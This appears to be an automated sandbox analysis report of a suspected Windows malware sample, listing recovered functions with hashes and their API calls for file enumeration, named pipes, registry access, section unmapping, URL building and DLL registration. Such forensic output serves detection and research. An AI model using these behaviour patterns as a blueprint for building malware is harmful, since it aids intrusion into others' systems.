  • Opcode ID: 532f2b5cd79be1598055c22557b2267d7091050a8bc957485613e12867e2baf4
  • Instruction ID: 7e10fe87f0924755e3c3f139aefbb8723367e80e6c71fdf06343399dbcc04d08
  • Opcode Fuzzy Hash: 63F076B8404D85CBC62364B588AA7BE46457F824E5D0CE33AA584B101B1F0365B79F85
  • Instruction Fuzzy Hash: 7e10fe87f0924755e3c3f139aefbb8723367e80e6c71fdf06343399dbcc04d08
APIs
  • InterlockedIncrement.KERNEL32(001EAF5C), ref: 001C1F73
  • lstrcpy.KERNEL32(00000000), ref: 001C1FA8
    • Part of subcall function 001D6CC6: lstrlen.KERNEL32(?,?,00000000,?,00000000,001C7543,?,?,?,?,?,?,?,?,?,001C1255), ref: 001D6CD5
    • Part of subcall function 001DD17E: memset.NTDLL ref: 001DD192
  • HeapFree.KERNEL32(00000000,?), ref: 001C2050
    • Part of subcall function 001DD36B: memset.NTDLL ref: 001DD3C6
    • Part of subcall function 001DD36B: SetLastError.KERNEL32(00000000,?,?,?), ref: 001DD41A
    • Part of subcall function 001DD36B: WaitForSingleObject.KERNEL32(?,?), ref: 001DD599
    • Part of subcall function 001DD36B: Sleep.KERNEL32(?,?,?,00000001,?,?,00000000,0000000C,0000000F,?,00000000,00000000,?,?,?,?), ref: 001DD5AA
  • GetLastError.KERNEL32(00000000), ref: 001C2039
  • InterlockedDecrement.KERNEL32(001EAF5C), ref: 001C2067
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C2098
    • Part of subcall function 001C771B: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001C775C
    • Part of subcall function 001C771B: lstrlen.KERNEL32(00000000,?,00000000,?,?,001C1255,00000000,00000000,00000004), ref: 001C7774
    • Part of subcall function 001C771B: RtlAllocateHeap.NTDLL(00000000,00000002), ref: 001C7788
    • Part of subcall function 001C771B: mbstowcs.NTDLL ref: 001C7798
    • Part of subcall function 001C771B: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C77B6
    • Part of subcall function 001C771B: CloseHandle.KERNEL32(?), ref: 001C77C0
    • Part of subcall function 001C771B: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C77CF
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
  • DeleteFileA.KERNEL32(00000000), ref: 001C2088
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 60
  • API ID: lstrlen$GetDriveTypeHeapFreeRtlAllocateHeapWaitForSingleObjectmemset
  • String ID:
  • API String ID: 3218151923-0
  • Opcode ID: 974418b0150871375a409eae20db66cf184f8890a346e9cc83530061c0aa9893
  • Instruction ID: 718056d6f187fa39222f68099688de0a74eaf81b8bf602d31d72af443bcdc1fc
  • Opcode Fuzzy Hash: 97F02461CA2887A7900B446974553AEDA116F416C9D4C0B62ED412814EAF0732E6EB4A
  • Instruction Fuzzy Hash: 718056d6f187fa39222f68099688de0a74eaf81b8bf602d31d72af443bcdc1fc
APIs
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C713F
  • memset.NTDLL ref: 001C715C
  • WaitForSingleObject.KERNEL32(00000000), ref: 001C7178
  • GetDriveTypeW.KERNEL32(?), ref: 001C7186
  • lstrlenW.KERNEL32(?), ref: 001C7192
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D6FCE
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D6FE9
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D704C
    • Part of subcall function 001D6F2E: wcscpy.NTDLL ref: 001D705E
    • Part of subcall function 001D6F2E: RtlEnterCriticalSection.NTDLL(?), ref: 001D70B9
    • Part of subcall function 001D6F2E: RtlLeaveCriticalSection.NTDLL(?), ref: 001D70D5
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D70EE
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D7100
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D7115
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D7129
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D71C1
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D71D3
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D71EE
  • lstrlenW.KERNEL32(?), ref: 001C71BF
  • HeapFree.KERNEL32(00000000,?), ref: 001C71D8
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 57
  • API ID: GetLastError$CloseHandleSetEndOfFileSetFilePointerWaitForSingleObjectWriteFile
  • String ID:
  • API String ID: 1310882240-0
  • Opcode ID: 428b72d32063ac54d5b905598191ac261dcad3cf285b84f146690d990cf327a1
  • Instruction ID: dcc1f0eea94f17c23c7c4056169672324f7f45eda8cbecba194d1740a202e92d
  • Opcode Fuzzy Hash: CAF02BA0515DC14BC217346516727BFD904EB425C5E4C7372A840420494F06769BAB5A
  • Instruction Fuzzy Hash: dcc1f0eea94f17c23c7c4056169672324f7f45eda8cbecba194d1740a202e92d
APIs
  • GetLastError.KERNEL32 ref: 001D6E41
  • WaitForSingleObject.KERNEL32(000000C8), ref: 001D6E66
  • SetFilePointer.KERNEL32(00000006,00000000,00000000,00000002), ref: 001D6EAF
  • WriteFile.KERNEL32(00000006,00001388,?,00000002,00000000), ref: 001D6EC4
  • SetEndOfFile.KERNEL32(00000006), ref: 001D6ED1
  • GetLastError.KERNEL32 ref: 001D6EDD
  • CloseHandle.KERNEL32(00000006), ref: 001D6EE9
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: memcpy$CallNamedPipeGetLastErrorHeapFreeRtlAllocateHeaplstrlen
  • String ID:
  • API String ID: 1038157847-0
  • Opcode ID: 6bb6ae630451ca86ee9df0719d803bcc4810f9cd3f6b8a390704e6ae44b564aa
  • Instruction ID: d7136f0b4a8b8e64e1482e4ffc83bf206dde2669044bc75a112f480993e26001
  • Opcode Fuzzy Hash: 73F05990085A81D2C123B42951217FFF194BEC02DBCDEA772E8E21885E2E0162A06B5D
  • Instruction Fuzzy Hash: d7136f0b4a8b8e64e1482e4ffc83bf206dde2669044bc75a112f480993e26001
APIs
  • lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
  • RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
  • memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
  • memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
  • CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
  • GetLastError.KERNEL32 ref: 001CBE07
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: HeapFree$DeleteFileStrTrimlstrlen
  • String ID: ss: *.*.*.*
  • API String ID: 1870149019-856079725
  • Opcode ID: 59ebdf1013b10810b54038a6e3da88a7dec1c4f015ef1646412946d67e45a806
  • Instruction ID: 3e73fb68dc78fb4356d5e34d04681ca3597a6c9d6a42a3bec15409b0af14ccc2
  • Opcode Fuzzy Hash: ECF09E21084D41AF8937286A50607F50915FB804F1C4DCFB7AC857B2857F836228BB4B
  • Instruction Fuzzy Hash: 3e73fb68dc78fb4356d5e34d04681ca3597a6c9d6a42a3bec15409b0af14ccc2
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
  • lstrlen.KERNEL32(00000000,?,00000F00), ref: 001C79CB
    • Part of subcall function 001C77DE: RtlAllocateHeap.NTDLL(00000000,00000020), ref: 001C7804
    • Part of subcall function 001C77DE: HeapFree.KERNEL32(00000000,?,00000000), ref: 001C7868
  • StrTrimA.SHLWAPI(00000000,001E53D4), ref: 001C7A55
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
  • HeapFree.KERNEL32(00000000,?,00000000), ref: 001C7A72
  • DeleteFileA.KERNEL32(00000000,00000000,?,?,001ECE60,00000000,?,00000F00), ref: 001C7A7A
  • HeapFree.KERNEL32(00000000,00000000,001ECE60), ref: 001C7A89
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: memcpy$RtlAllocateHeap
  • String ID: [URL]$https://
  • API String ID: 3738462082-2839221783
  • Opcode ID: afc151603a67bdcf01d5cf8a846d0f5f8a912d4aa94ead1b687b7b5f553c7413
  • Instruction ID: 8b64b784777f98c5150798b715af9fa38b42791515c7252616206b20b48db7ab
  • Opcode Fuzzy Hash: 21E02B245D1F02D6D85A20845438BB7C6873D42394CAE7766C950255772A25B174B588
  • Instruction Fuzzy Hash: 8b64b784777f98c5150798b715af9fa38b42791515c7252616206b20b48db7ab
APIs
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
  • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 001C7DC3
  • memcpy.NTDLL(00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7DE9
  • memcpy.NTDLL(00000000,?,?,00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7DF8
  • memcpy.NTDLL(?,?,?,00000000,?,?,00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7E0A
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 62
  • API ID: HeapFree$CloseHandleCreateFileRtlAllocateHeaplstrlenmbstowcs
  • String ID:
  • API String ID: 1841334458-0
  • Opcode ID: 88abf7bf9e6c094b0eee3fb77fa4d18763972b4349be3218ed9dbfc152fe13ca
  • Instruction ID: b1b32dbb2b339a72f492d846fbfcd069bc98c7ba0488c115e2d4a43b7119fad5
  • Opcode Fuzzy Hash: 2BE02B71181D5096C02719A68C58339E6056F422E4E5D4627FA013910FB24317E8EBAB
  • Instruction Fuzzy Hash: b1b32dbb2b339a72f492d846fbfcd069bc98c7ba0488c115e2d4a43b7119fad5
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C7527: LocalFree.KERNEL32(?,?,?,?,00000000,00000000,00000000), ref: 001C75DB
    • Part of subcall function 001C7527: WaitForSingleObject.KERNEL32(00000000,00000000), ref: 001C75FC
  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001C775C
  • lstrlen.KERNEL32(00000000,?,00000000,?,?,001C1255,00000000,00000000,00000004), ref: 001C7774
  • RtlAllocateHeap.NTDLL(00000000,00000002), ref: 001C7788
  • mbstowcs.NTDLL ref: 001C7798
    • Part of subcall function 001C7B90: GetSystemTimeAsFileTime.KERNEL32(001C77AB,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7BAD
    • Part of subcall function 001C7B90: memcpy.NTDLL(001C77AB,?,00000009,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7BCF
    • Part of subcall function 001C7B90: RtlAllocateHeap.NTDLL(00000000,00000013), ref: 001C7BE7
    • Part of subcall function 001C7B90: lstrlenW.KERNEL32(00000000,00000001,001C77AB,?,?,?,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7C07
    • Part of subcall function 001C7B90: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C7C2C
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C77B6
  • CloseHandle.KERNEL32(?), ref: 001C77C0
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C77CF
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 50
  • API ID: CloseHandleCreateThreadGetLastErrorHeapFreeRtlAllocateHeaplstrcpylstrlen
  • String ID:
  • API String ID: 1766977795-0
  • Opcode ID: b41ce86395a358d9a6be2e887350fb16e7ee7d04885f28ea6336c7c9663497fb
  • Instruction ID: 96ec21c43bdbaae9be4f5f8da8c7882276515f35e524364d2f59df83c05b1c59
  • Opcode Fuzzy Hash: A8E026A5068C0583807778228061BAF9B82BAC10D8C8D7123FE402614B2F037487DF2B
  • Instruction Fuzzy Hash: 96ec21c43bdbaae9be4f5f8da8c7882276515f35e524364d2f59df83c05b1c59
APIs
  • lstrlen.KERNEL32(?,00000000,00000000,00000001,?,?,?,001C27D1,001C1F61,00000000,00000000,?,?,?,001C4A87,00000000), ref: 001C242D
  • RtlAllocateHeap.NTDLL(00000000,00000009,00000000), ref: 001C2440
  • lstrcpy.KERNEL32(00000008,?), ref: 001C2462
  • CreateThread.KERNEL32(00000000,00000000,001C23CD,00000000,00000000,00000000), ref: 001C247A
  • CloseHandle.KERNEL32(00000000), ref: 001C2485
  • GetLastError.KERNEL32(?,?,?,001C27D1,001C1F61,00000000,00000000,?,?,?,001C4A87,00000000,001EC202,00000000,00000000,00000000), ref: 001C248D
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C249E
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 61
  • API ID: GetCurrentThreadGetCurrentThreadIdRtlAllocateHeaplstrcmplstrlenwsprintf
  • String ID:
  • API String ID: 236900386-0
  • Opcode ID: 0432ee343612a59173c04e27a8b524be30c23a17c6314db2962a76565d5ddb3c
  • Instruction ID: 7b15706a537a474bb122a8de5c1759b17b8367dcae199ddad95220069e92854f
  • Opcode Fuzzy Hash: F7119B31058EC2A7441760C18092BBED450FC920E580D37F2EEB86A2CE6F43258B2B1B
  • Instruction Fuzzy Hash: 7b15706a537a474bb122a8de5c1759b17b8367dcae199ddad95220069e92854f
APIs
    • Part of subcall function 001C45F0: HeapFree.KERNEL32(00000000,?), ref: 001C46AF
    • Part of subcall function 001C45F0: WaitForSingleObject.KERNEL32(00000000), ref: 001C4713
    • Part of subcall function 001C45F0: HeapFree.KERNEL32(00000000,?), ref: 001C473C
    • Part of subcall function 001C45F0: HeapFree.KERNEL32(00000000,00000000), ref: 001C474C
    • Part of subcall function 001C45F0: RegCloseKey.ADVAPI32(?,?,?,00000000,001CB4E0,00000000,00000000,?,001CD6FE), ref: 001C4755
    • Part of subcall function 001D829C: lstrlen.KERNEL32(?,00000000,001EABBC,?,001C194F,?), ref: 001D82A6
    • Part of subcall function 001D829C: StrRChrA.SHLWAPI(?,00000000,0000002E), ref: 001D82D1
    • Part of subcall function 001D829C: lstrcat.KERNEL32(00000000,?), ref: 001D8317
  • lstrcmp.KERNEL32(?,?), ref: 001C4F65
  • GetCurrentThreadId.KERNEL32(?,?,00000000,?,Function_00003E59,?,00000001), ref: 001C5037
  • GetCurrentThread.KERNEL32 ref: 001C5048
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
    • Part of subcall function 001C1916: RegOpenKeyA.ADVAPI32(80000001,?), ref: 001C192A
    • Part of subcall function 001C1916: RegCloseKey.ADVAPI32(?), ref: 001C1958
  • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 001C50A6
  • wsprintfA.USER32 ref: 001C50B7
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C50C2
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: HeapFreelstrlen$mbstowcswcstombs
  • String ID:
  • API String ID: 2099024402-0
  • Opcode ID: e75e910ff2ec0d94baf6de8394c43fdc3fb5dca6cdb9e0b5bf2cf534734101ee
  • Instruction ID: f24fee1122799b27caa4df9cbb6a3a124512d5817c5fb220c5a419a916dfbbd2
  • Opcode Fuzzy Hash: 88E02BB20C04C297060710B3847577DDA09BCC21D100E53ABDB08EC34DA68723A5BB6F
  • Instruction Fuzzy Hash: f24fee1122799b27caa4df9cbb6a3a124512d5817c5fb220c5a419a916dfbbd2
APIs
  • lstrlenW.KERNEL32(?), ref: 001C8CC7
  • wcstombs.NTDLL ref: 001C8CE7
    • Part of subcall function 001C8B4E: RtlAllocateHeap.NTDLL(00000000,001E5065,?), ref: 001C8BEE
    • Part of subcall function 001C8B4E: memcpy.NTDLL(00000000,00000000,00000000), ref: 001C8C05
    • Part of subcall function 001C8B4E: HeapFree.KERNEL32(00000000,00000000), ref: 001C8C18
    • Part of subcall function 001C8B4E: memcpy.NTDLL(00000000,?,?), ref: 001C8C27
    • Part of subcall function 001C8B4E: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C8C8B
  • lstrlen.KERNEL32(00000000), ref: 001C8D0B
  • mbstowcs.NTDLL ref: 001C8D2D
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C8D3F
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C8D59
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 320
  • API ID: GetLastError$CloseHandleCreateFileSetEndOfFileWriteFile
  • String ID:
  • API String ID: 3756146440-0
  • Opcode ID: 4915370d64bf5c115dcc7df05119504ed8106c73e5c20004021290fc9b098e04
  • Instruction ID: 25e21f08b45b65ae728795522a9e901a714bf6768e996c71cc9bf29c7ae853b0
  • Opcode Fuzzy Hash: A8D0126D078B4ED4D91985A715E2F03E1915F33700E3C460872607926A8B3673AEDF49
  • Instruction Fuzzy Hash: 25e21f08b45b65ae728795522a9e901a714bf6768e996c71cc9bf29c7ae853b0
APIs
  • CreateFileW.KERNEL32(01B37494,C0000000,00000000,00000000,00000004,00000080,00000000), ref: 01B34B26
  • GetLastError.KERNEL32(?,01B32C59,00000000,01B37494,?,00001FD1,00000000,00000000,?,?,01B318C5,?,?), ref: 01B34B33
  • WriteFile.KERNEL32(00000000,?,00001000,01B37494,00000000), ref: 01B34B49
  • SetEndOfFile.KERNEL32(00000000,?,01B32C59,00000000,01B37494,?,00001FD1,00000000,00000000,?,?,01B318C5,?,?), ref: 01B34B54
  • GetLastError.KERNEL32(?,01B32C59,00000000,01B37494,?,00001FD1,00000000,00000000,?,?,01B318C5,?,?), ref: 01B34B5C
  • CloseHandle.KERNEL32(00000000), ref: 01B34B65
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 57
  • API ID: SetLastErrorSleepWaitForSingleObjectmemset
  • String ID: vids
  • API String ID: 1012678829-3767230166
  • Opcode ID: a88323ab6a07f6567de602f156fbacf356d172862014bdadb632bb7e4ac17ede
  • Instruction ID: 7794b0509761be8d864e16b56acb391e5ba30bd334e757b795fdcad4b1508c3e
  • Opcode Fuzzy Hash: E1216B4906CCE1E3D8E268440463F6D32146F83DFAD4DA72667BE9A6D75F012306D629
  • Instruction Fuzzy Hash: 7794b0509761be8d864e16b56acb391e5ba30bd334e757b795fdcad4b1508c3e
APIs
  • memset.NTDLL ref: 001DD3C6
  • SetLastError.KERNEL32(00000000,?,?,?), ref: 001DD41A
    • Part of subcall function 001DD348: GetSystemTimeAsFileTime.KERNEL32(00000001,?,?,?,001DD513,?,00000000,00000000,?,?,?,?,00000000,?,?,?), ref: 001DD351
    • Part of subcall function 001DD348: _aulldiv.NTDLL(00000001,?,00002710,00000000), ref: 001DD364
  • WaitForSingleObject.KERNEL32(?,?), ref: 001DD599
  • Sleep.KERNEL32(?,?,?,00000001,?,?,00000000,0000000C,0000000F,?,00000000,00000000,?,?,?,?), ref: 001DD5AA
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 54
  • API ID: HeapFreeRtlAllocateHeap
  • String ID: https://
  • API String ID: 3817218409-4275131719
  • Opcode ID: f288712f8a6e8bd0bf07739e93ef791456e10643a80339435031cd9f7b6ed460
  • Instruction ID: 0d42b4968aba57015724f328e6a5f9a864d8608e83dd0059b415151ddedf116b
  • Opcode Fuzzy Hash: 18F08B601A85C2A6802718C294AC7B2C604BE80AC0D8D536FFF503929E5FA770D5BB0A
  • Instruction Fuzzy Hash: 0d42b4968aba57015724f328e6a5f9a864d8608e83dd0059b415151ddedf116b
APIs
    • Part of subcall function 001C5ADD: GetSystemTimeAsFileTime.KERNEL32(?), ref: 001C5AEB
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C83ED
  • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C843C
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6E41
    • Part of subcall function 001D6DF6: WaitForSingleObject.KERNEL32(000000C8), ref: 001D6E66
    • Part of subcall function 001D6DF6: SetFilePointer.KERNEL32(00000006,00000000,00000000,00000002), ref: 001D6EAF
    • Part of subcall function 001D6DF6: WriteFile.KERNEL32(00000006,00001388,?,00000002,00000000), ref: 001D6EC4
    • Part of subcall function 001D6DF6: SetEndOfFile.KERNEL32(00000006), ref: 001D6ED1
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6EDD
    • Part of subcall function 001D6DF6: CloseHandle.KERNEL32(00000006), ref: 001D6EE9
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C8471
  • HeapFree.KERNEL32(00000000,?), ref: 001C8481
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 53
  • API ID: HeapFreeRegCloseKeyRegOpenKeyRtlAllocateHeap
  • String ID: Main
  • API String ID: 1238789381-521822810
  • Opcode ID: 430bf3c3e099aaf98ba0d13378e5d8da2de179d3274a2f5d09db6df723472999
  • Instruction ID: 8f29cc0f23f969ede819062a95f7fcd74d74c9a74bdfea75fafa15d21f68d3cc
  • Opcode Fuzzy Hash: CAE026B00A45C5AA403B7C81647B2F29410F9A08C20CD976BEE009F28CAE4670A27B9A
  • Instruction Fuzzy Hash: 8f29cc0f23f969ede819062a95f7fcd74d74c9a74bdfea75fafa15d21f68d3cc
APIs
  • RegOpenKeyA.ADVAPI32(80000001,?), ref: 001C4220
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C4256
  • HeapFree.KERNEL32(00000000,?), ref: 001C428F
  • RegCloseKey.ADVAPI32(?), ref: 001C4298
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 45
  • API ID: CreateDirectoryHeapFreeRtlAllocateHeaplstrlen
  • String ID: %APPDATA%\Microsoft\
  • API String ID: 3959905781-2699254172
  • Opcode ID: a91e168cb75582dc69dc678417b6008db4073c04297a41e19573c560bdc487dc
  • Instruction ID: cffe0b6492667c1a66e0568daab83b9343bd146d6441e28ba88ab90f7e1d944e
  • Opcode Fuzzy Hash: 10D05EB0444802AB953BA426806A739884A7F823D0C5E7536E9404A26FBB9362956E6A
  • Instruction Fuzzy Hash: cffe0b6492667c1a66e0568daab83b9343bd146d6441e28ba88ab90f7e1d944e
APIs
  • RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 001C29D8
    • Part of subcall function 001D6CC6: lstrlen.KERNEL32(?,?,00000000,?,00000000,001C7543,?,?,?,?,?,?,?,?,?,001C1255), ref: 001D6CD5
  • CreateDirectoryW.KERNEL32(00000000,00000000,?,?,001C2A7A,00000000), ref: 001C2A06
  • lstrlenW.KERNEL32(00000000,?,?,001C2A7A,00000000), ref: 001C2A12
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C2A2A
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: lstrlen$RtlAllocateHeap
  • String ID: [FILE]$DllRegisterServer
  • API String ID: 2544908171-3029713317
  • Opcode ID: 2d4b95e8c34fd7eb35c32aaba08f5fcf9921a6e8c8be63207aa385bfa2f516c2
  • Instruction ID: 5cabe30f11294075a22546247cc9a04f0ebb488a8614786e1935660b83a97d3e
  • Opcode Fuzzy Hash: 73C012709914038B04177926842423CC68A39957E540E0619E8473611A5B0302CD5A1E
  • Instruction Fuzzy Hash: 5cabe30f11294075a22546247cc9a04f0ebb488a8614786e1935660b83a97d3e
APIs
  • lstrlenW.KERNEL32(00000000,00000000,00000000,.dll,001C2B1B,00000000,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001D9EB8
  • lstrlen.KERNEL32(DllRegisterServer), ref: 001D9EC6
  • RtlAllocateHeap.NTDLL(00000000,00000022), ref: 001D9EDB
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 40
  • API ID: HeapFreeInterlockedExchangeRtlAllocateHeapmemcpywsprintf
  • String ID:
  • API String ID: 3372225998-0
  • Opcode ID: 61e3c6596c7711a58e405f94e11cad7776fca466765ac99ea6157a7d77fb77b6
  • Instruction ID: da8d2039801b4c8d43c4b5d75199c0239940cb1666a4492243b1b8028872bfb2
  • Opcode Fuzzy Hash: B6110E75048A40CF89337492402A6BBDA81BD914C798C9763E90C3A5AF4903F29B7F07
  • Instruction Fuzzy Hash: da8d2039801b4c8d43c4b5d75199c0239940cb1666a4492243b1b8028872bfb2
APIs
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001CAF93
    • Part of subcall function 001D8FBB: GetLocalTime.KERNEL32(?), ref: 001D8FC5
    • Part of subcall function 001D8FBB: wsprintfA.USER32 ref: 001D8FF1
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CB0F1
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
  • wsprintfA.USER32 ref: 001CB04B
  • memcpy.NTDLL(00000000,?,?), ref: 001CB090
  • InterlockedExchange.KERNEL32(001EAFEC,00000000), ref: 001CB0AE
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
